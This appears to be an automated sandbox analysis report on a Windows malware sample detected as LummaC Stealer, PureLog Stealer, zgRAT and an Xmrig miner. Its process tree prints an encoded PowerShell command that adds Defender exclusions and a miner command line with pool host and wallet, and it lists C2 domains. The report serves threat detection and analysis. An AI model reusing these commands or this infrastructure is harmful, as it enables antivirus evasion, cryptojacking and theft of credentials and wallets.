Edit tour

Windows Analysis Report
PT54FFSL7ET46RASB.exe

Overview

General Information

Sample name:	PT54FFSL7ET46RASB.exe
Analysis ID:	1513635
MD5:	8199c105289d70af5446c7fd64496d7b
SHA1:	8402abc838e34e9dd996127ec39481f7cda4372b
SHA256:	ffee1e842c0a7932d3d3905a6677f35f3ea29dfb48661e537d28eb8b7212669d
Infos:

Detection

LummaC Stealer, PureLog Stealer, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Xmrig

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Detected Stratum mining protocol

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Potential Crypto Mining Activity

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected PersistenceViaHiddenTask

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious Execution of Powershell with Base64

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64native

PT54FFSL7ET46RASB.exe (PID: 3088 cmdline: "C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe" MD5: 8199C105289D70AF5446C7FD64496D7B)

conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

RegAsm.exe (PID: 6224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

glmIOFfdMi.exe (PID: 6648 cmdline: "C:\Users\user\AppData\Roaming\glmIOFfdMi.exe" MD5: C164ED9887BD51CBA150379514DC4E81)

cmd.exe (PID: 8780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 8840 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

PING.EXE (PID: 8856 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)

l6E.exe (PID: 8932 cmdline: "C:\Users\user\AppData\Roaming\l6E.exe" MD5: FAC2188E4A28A0CF32BF4417D797B0F8)

conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

RegAsm.exe (PID: 9052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 9164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 9052 -s 1740 MD5: 40A149513D721F096DDF50C04DA2F01F)

YZRVUYjilL.exe (PID: 940 cmdline: "C:\Users\user\AppData\Roaming\YZRVUYjilL.exe" MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

powershell.exe (PID: 2320 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WmiPrvSE.exe (PID: 8288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

Current.exe (PID: 6912 cmdline: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

RegSvcs.exe (PID: 8344 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe MD5: DC67ADE51149EC0C373A379473895BA1)

AddInProcess.exe (PID: 8596 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)

Current.exe (PID: 8884 cmdline: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

svchost.exe (PID: 9104 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: F586835082F632DC8D9404D83BC16316)

WerFault.exe (PID: 9140 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9052 -ip 9052 MD5: 40A149513D721F096DDF50C04DA2F01F)

svchost.exe (PID: 4364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: F586835082F632DC8D9404D83BC16316)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["reggwardssdqw.shop", "tesecuuweqo.shop", "relaxatinownio.shop", "eemmbryequo.shop", "keennylrwmqlw.shop", "tendencctywop.shop", "licenseodqwmqn.shop", "tryyudjasudqo.shop"], "Build id": "hv0fRu--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.376484616059.00000180E3942000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000A.00000002.375954186503.0000021EAAA61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.375920601322.000001F52CF50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.378512569504.00000000073E0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0000000D.00000002.378432123906.000001FB39807000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000012.00000002.376494366801.00000180F3D65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.378430242891.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.375975223417.0000021EBAF95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000012.00000002.376494366801.00000180F3B85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.375928489806.000001F53EC95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.378432123906.000001FB3983F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000D.00000002.378432123906.000001FB39877000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000A.00000002.375975223417.0000021EBADB5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.378376086685.00000245CC611000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000A.00000002.375975223417.0000021EBABB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.378358238334.0000000140799000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000007.00000002.375928489806.000001F53EA65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000012.00000002.376494366801.00000180F3981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.378430242891.0000000003E29000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000007.00000002.375941467848.000001F547619000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x463b8:$a1: mining.set_target 0x40e90:$a2: XMRIG_HOSTNAME 0x42f60:$a3: Usage: xmrig [OPTIONS] 0x40e68:$a4: XMRIG_VERSION
00000007.00000002.375928489806.000001F53E761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x468d8:$a1: mining.set_target 0x413b0:$a2: XMRIG_HOSTNAME 0x43480:$a3: Usage: xmrig [OPTIONS] 0x41388:$a4: XMRIG_VERSION
00000012.00000002.376494366801.00000180F3B35000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000012.00000002.376484616059.00000180E3831000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000A.00000002.375954186503.0000021EAADD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
0000000A.00000002.375975223417.0000021EBAD65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.375920946820.000001F52E761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.375920946820.000001F52E93B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
0000000C.00000002.378458637252.00000245DD3EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000D.00000002.378358238334.0000000140000000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: YZRVUYjilL.exe PID: 940	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: YZRVUYjilL.exe PID: 940	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: Current.exe PID: 6912	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Current.exe PID: 6912	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: RegSvcs.exe PID: 8344	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: RegSvcs.exe PID: 8344	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RegSvcs.exe PID: 8344	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xc72b8:$a1: mining.set_target 0xc3176:$a2: XMRIG_HOSTNAME 0xc4492:$a3: Usage: xmrig [OPTIONS] 0xc3157:$a4: XMRIG_VERSION
Process Memory Space: AddInProcess.exe PID: 8596	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: AddInProcess.exe PID: 8596	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x93cea:$a1: mining.set_target 0x8fba8:$a2: XMRIG_HOSTNAME 0x90ec4:$a3: Usage: xmrig [OPTIONS] 0x8fb89:$a4: XMRIG_VERSION
Process Memory Space: Current.exe PID: 8884	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.Current.exe.21ebabb19e0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
18.2.Current.exe.180e387fc48.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
18.2.Current.exe.180f39819e0.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.YZRVUYjilL.exe.1f52cf50000.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
18.2.Current.exe.180f3b35b38.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
18.2.Current.exe.180f3d65be0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
10.2.Current.exe.21ebad65b38.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
6.2.glmIOFfdMi.exe.3e297c0.7.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.glmIOFfdMi.exe.3e297c0.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.glmIOFfdMi.exe.3e297c0.7.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcec42:$s1: file:/// 0xceb52:$s2: {11111-22222-10009-11112} 0xcebd2:$s3: {11111-22222-50001-00000} 0xc81a4:$s4: get_Module 0xc8588:$s5: Reverse 0xcda70:$s6: BlockCopy 0xbe846:$s7: ReadByte 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.Current.exe.21ebaf95be0.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.YZRVUYjilL.exe.1f53eab5b70.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
18.2.Current.exe.180f3b85b70.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.glmIOFfdMi.exe.73e0000.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.glmIOFfdMi.exe.3e297c0.7.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.Current.exe.21ebadb5b70.13.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
10.2.Current.exe.21ebad65b38.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.YZRVUYjilL.exe.1f53e8b19e0.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
18.2.Current.exe.180f3b35b38.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.glmIOFfdMi.exe.3ce97a0.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
7.2.YZRVUYjilL.exe.1f53ea65b38.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
6.2.glmIOFfdMi.exe.3ce97a0.2.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.glmIOFfdMi.exe.3ce97a0.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.glmIOFfdMi.exe.3ce97a0.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcec42:$s1: file:/// 0xceb52:$s2: {11111-22222-10009-11112} 0xcebd2:$s3: {11111-22222-50001-00000} 0xc81a4:$s4: get_Module 0xc8588:$s5: Reverse 0xcda70:$s6: BlockCopy 0xbe846:$s7: ReadByte 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
7.2.YZRVUYjilL.exe.1f53ea65b38.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.YZRVUYjilL.exe.1f53ec95be0.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
18.2.Current.exe.180e387fc48.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
6.2.glmIOFfdMi.exe.73e0000.9.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.glmIOFfdMi.exe.73e0000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.glmIOFfdMi.exe.73e0000.9.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcec42:$s1: file:/// 0xceb52:$s2: {11111-22222-10009-11112} 0xcebd2:$s3: {11111-22222-50001-00000} 0xc81a4:$s4: get_Module 0xc8588:$s5: Reverse 0xcda70:$s6: BlockCopy 0xbe846:$s7: ReadByte 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
12.2.RegSvcs.exe.245dd3ecee0.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
